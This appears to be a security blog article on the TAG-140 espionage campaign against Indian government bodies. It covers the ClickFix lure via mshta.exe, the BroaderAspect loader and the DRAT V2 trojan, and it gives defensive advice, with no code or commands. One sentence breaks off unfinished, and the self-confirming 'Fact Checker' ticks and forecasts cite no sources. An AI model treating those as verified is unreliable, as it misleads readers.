TAG-140 Cyber Espionage Targets Indian Government: A New Evolution in APT Threats

Cyber Threat Landscape: An Urgent Global Concern

The cybersecurity battlefield continues to expand, especially across politically tense regions such as South Asia. A new wave of advanced cyberattacks has emerged, with Indian government entities being the latest targets of a sophisticated threat actor campaign dubbed TAG-140. This campaign, recently documented by researchers from Recorded Future’s Insikt Group, signals not just another attack, but an evolution in remote access tools and the strategic targeting methods used by state-aligned cyber adversaries. The attack overlaps with behaviors linked to SideCopy—an affiliate of Transparent Tribe, a known Pakistani APT group. This article dives into the critical components of the campaign, the tools used, and the broader implications for cybersecurity defenses worldwide.

TAG-140: the Campaign

A threat actor known as TAG-140, believed to be aligned with Pakistani intelligence interests, has launched a targeted campaign against Indian government sectors using a customized version of the DRAT remote access trojan (RAT). The attack methodology bears resemblance to tactics employed by SideCopy, a subgroup under the umbrella of Transparent Tribe, a Pakistani APT entity.

The campaign leveraged a ClickFix-style lure, where victims were tricked into executing a malicious script via mshta.exe. This triggered the BroaderAspect .NET loader, which then deployed DRAT V2, a new and more capable Delphi-compiled RAT. The infection path was likely initiated via spear-phishing emails, although the precise delivery mechanism has yet to be confirmed.

The malicious infrastructure mimicked a legitimate Indian Ministry of Defense press release portal, exploiting trust and familiarity to gain access. Unlike previous operations that focused solely on defense and academic sectors, this campaign expanded into domains like railways, oil & gas, and external affairs ministries.

DRAT V2 signifies a strategic upgrade in capabilities, supporting a custom TCP-based, server-initiated C2 protocol, and introducing enhanced flexibility in post-exploitation. TAG-140’s arsenal includes other malware families like CurlBack, SparkRAT, AresRAT, Xeno RAT, AllaKore, and ReverseRAT, emphasizing their operational adaptability.

Despite DRAT V2’s upgrade, it still employs basic persistence techniques, making it vulnerable to static and behavioral detection. Once embedded, the RAT can exfiltrate data, upload new payloads, and perform system reconnaissance, all while maintaining persistence. Researchers recommend monitoring loader reuse, spear-phishing infrastructure, and behavioral cues rather than focusing solely on malware signatures for effective threat detection.

What Undercode Say:

TAG-140’s latest campaign represents a textbook example of modern cyber warfare tactics, particularly in geopolitically charged regions. What sets this attack apart isn’t just the sophistication of the tools used, but the strategic targeting of multiple sectors essential to national stability—defense, energy, diplomacy, and infrastructure.

This operation reflects the growing complexity of state-aligned APT groups. Rather than relying on high-tech zero-days, they are mastering social engineering and persistence to quietly infiltrate and remain undetected in critical systems. The use of spear-phishing lures disguised as press portals is an old tactic, but its continued effectiveness underlines the need for more robust employee awareness training and email threat protection.

From a technical standpoint, the evolution from .NET-based DRAT to a Delphi-compiled version shows how threat actors are adjusting to static detection methods, possibly attempting to bypass signature-based AV engines and improve portability. The inclusion of a custom TCP-based, server-initiated C2 protocol gives them even more control over compromised environments, allowing real-time decision-making during reconnaissance or data exfiltration.

The presence of other malware families in their toolkit (such as SparkRAT and Xeno RAT) also suggests that TAG-140 is operating with a modular, scalable infrastructure—capable of shifting tactics rapidly based on mission objectives or target defenses.

However, it’s important to note that the

Strategically, this campaign underscores how nation-state cyber programs are broadening their scope, targeting not only military but also civilian infrastructure. The blending of operational espionage with cyber sabotage could be the next phase. Hence, governments and enterprises alike must pivot toward threat behavior-based detection frameworks and invest in cyber threat intelligence partnerships to stay ahead.

Ultimately, TAG-140 is not just a threat to India but a signal to the global cybersecurity community: the borders of cyber conflict are expanding, and traditional defenses are no longer enough. We must evolve as rapidly as the attackers.

🔍 Fact Checker Results

✅ TAG-140 is aligned with SideCopy, which has established links to Pakistani APT operations.
✅ DRAT V2 uses Delphi, marking a shift from earlier .NET implementations.
✅ Initial infection involves mshta.exe and BroaderAspect loader, a method seen in prior campaigns by the group.

📊 Prediction

Expect TAG-140 and similar APT groups to further target regional power structures, including transportation and energy sectors across South Asia and possibly Southeast Asia. As detection methods evolve, threat actors will likely adopt more polymorphic malware and dynamic C2 channels, forcing cybersecurity teams to shift from signature-based defense to real-time behavioral analytics. With escalating tensions in the region, cyberattacks will increasingly be used as soft-power weapons in hybrid warfare scenarios.